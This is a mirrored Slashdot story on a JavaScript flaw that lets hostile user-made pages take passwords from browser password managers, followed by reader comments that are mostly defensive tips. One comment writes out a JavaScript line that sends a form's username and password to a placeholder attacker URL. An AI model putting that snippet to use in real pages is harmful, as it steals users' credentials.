Slashdot Mirror

← Back to Stories (view on slashdot.org)

Holes Remain Open in Firefox Password Manager

Posted by Zonk on from the batten-down-the-hatches dept.

juct writes "Although the Mozilla developers have fixed a known hole in the password manager of Firefox & Co, a door remains open for exploitation. According to an article on the heise site, hackers can still use JavaScript to steal passwords from users of the Mozilla, Firefox, and Safari browsers. However, the real problem might not be Firefox' password manager. If users can set up their own pages containing script code on a server, the JavaScript security model breaks. Heise Security demonstrates the possible password theft in a demo. 'From the users' perspective, this means that they should not entrust their passwords to the password manager on web sites that allow other users to create their own pages containing scripts. Otherwise somebody can easily create a page that steals the password as soon as the page is opened ... Users could also disable JavaScript or use add-ons such as NoScript to set up rules to provide additional protection. In the age of Web 2.0 this would, however, mean that many pages would cease to function. On the other hand it is doubtful that by not using a password manager security levels would be raised, since the resultant need to remember passwords often induces users to choose simplistic passwords and use them on multiple sites.'"

10 of 191 comments (clear)

  1. Clarification by jojoba_oil · · Score: 5, Informative

    Users could also disable JavaScript or use add-ons such as NoScript to set up rules to provide additional protection. In the age of Web 2.0 this would, however, mean that many pages would cease to function. That's very misleading. Allow me to clarify:

    Users could also disable JavaScript, which in the age of Web2.0 would cause many pages to display incorrectly. A better alternative is NoScript!, an add-on that allows users to selectively white-list pages, servers, or domains to use JavaScript.

    1. Re:Clarification by jojoba_oil · · Score: 2, Informative

      Then someone who browses userpages has essentially the equivalent of having JS turned off and gets bugged every 2 seconds. And the potential problem that someone might generate content you want to see and bug it. Gets bugged every 2 seconds? Have you used NoScript? It provides a very minimally intrusive bar along the bottom of the browser stating "NoScript has blocked X number of scripts", and you can even turn that off. And without scripting enabled on a page, how do you expect the page to "bug" users to enable JavaScript? The very best they can do is provide a <noscript> tag asking for it -- and then we'd be assuming the user can make the decision themselves.

      Browsing websites such as MySpace works fine without JavaScript -- they want users on their pages, even if their browser doesn't support/enable JavaScript. It is extremely rare that I stumble across a website that I cannot get working. As for user-generated content, that's precisely the reason NoScript! allows you to whitelist specific pages. (Or being that I'm not a dev, perhaps it's just a handy use for that feature).

      Please stop spreading FUD and use an extension before you try to knock it.

    2. Re:Clarification by Anonymous Coward · · Score: 1, Informative

      Browsing websites such as MySpace works fine without JavaScript -- they want users on their pages, even if their browser doesn't support/enable JavaScript.

      Browsing myspace does not work fine without javascript. They use it for at least the "pager" (<< 1 2 3 >>) in the comments/groups/forums. Fine if you want to view only one page I guess....
  2. Re:Lies, damned lies by Anonymous Coward · · Score: 2, Informative

    IE is not affected because it doesn't automatically enter the info into the forms on load.

  3. Re:Firefox password manager by Derek+Pomery · · Score: 4, Informative

    Your first mistake is not setting a master password in Firefox.
    Once you do that it won't be able to read them either.
    Its failure to read the Opera ones means either A) you set a master password in Opera or B) no one cares about Opera so program doesn't even look for them.

    --
    -- perl -e'print pack"H*","6e656d6f406d38792e6f7267"' /. ate my old sig. Bastards.
  4. KeePass by Juneau · · Score: 2, Informative

    Use KeePass http://keepass.info/. Open source, and better automation with websites and much more control than the internal password manager.

  5. Use the Secure Login FF Extension by EMR · · Score: 3, Informative

    By using this extension, the security whole is fixed. Just have to wait around for FF to implement it natively.
    This extension provides a *wand* like Opera has. (which is not affected by this security hole, because of this functionality).

    https://addons.mozilla.org/en-US/firefox/addon/442 9

  6. Re:Lies, damned lies by discord5 · · Score: 3, Informative

    I call bullshit. If the "real problem might not be Firefox password manager", then why IE6 and IE7 password managers are not vulnerable?

    Actually, the IE6 and IE7 password managers will most likely equally vulnerable. If you do a little looking at the code, all they really do is just scoop the login and pass from the input fields. Mozilla fills it in by default if only one login is available. I don't know exactly what IE does in this case, but I'm guessing that even if IE doesn't fill out the password right away, you can still add an extra onSubmit to the form and do your thing.

    From the MSDN website I can quote:

    When the AutoComplete feature is set to save passwords, a password is automatically filled in when a known user name is provided, and the password and user name are stored by URL. When changing passwords, the user is prompted to save the new password.

    So as far as I can tell, you just need to enter a username and be on the correct URL. If by URL they mean "exactly the same page" this won't work unless you can trick the browser somehow, but if it is "the same (sub)domain" it will. Since I don't have an IE at my disposal right now, I can't test it, but I suppose it will work when you use onSubmit.

    document.location="http://some.hackers.url/collect .php?user=" + document.form.user.value + "&pass=" + document.form.pass.value;

    Then redirect to the login page hoping that the site doesn't check referrers (most likely they don't), and you're set to go. Sites that allow users to enter HTML and especially javascript are begging for this sort of thing, and there are much worse things you can do once someone gives you free play with javascript anyway (cookies anyone?)

    Just stating the obvious, although now I'm actually curious if this works on IE...

  7. Secure Login extension by David_W · · Score: 3, Informative

    Do not use a pull model but a push model like the bugmenot extension.

    You know, that's not a bad idea. Apparently someone else had it too. Check out the Secure Login extension. It doesn't use a right click (although I kinda wish it did; may have to suggest that) but it does have a shortcut key and an icon.

    Thanks for saying that; I would have never thought to go looking for such an extension without you saying it.

  8. Re:Firefox password manager by mhall119 · · Score: 3, Informative

    Last--FF needs a master password set to be even remotely secure with regard to passwords, while Opera does not. This seems like a big hole. If Opera has encrypted your passwords, then it must have a copy of the decryption key stored somewhere in order to read them. It would seem that your program's author just didn't know where the key way, or it would have been able to read the Opera passwords too. Someone can correct me on this if I'm wrong (not a big Opera user), but to me it sounds like security through obscurity.
    --
    http://www.mhall119.com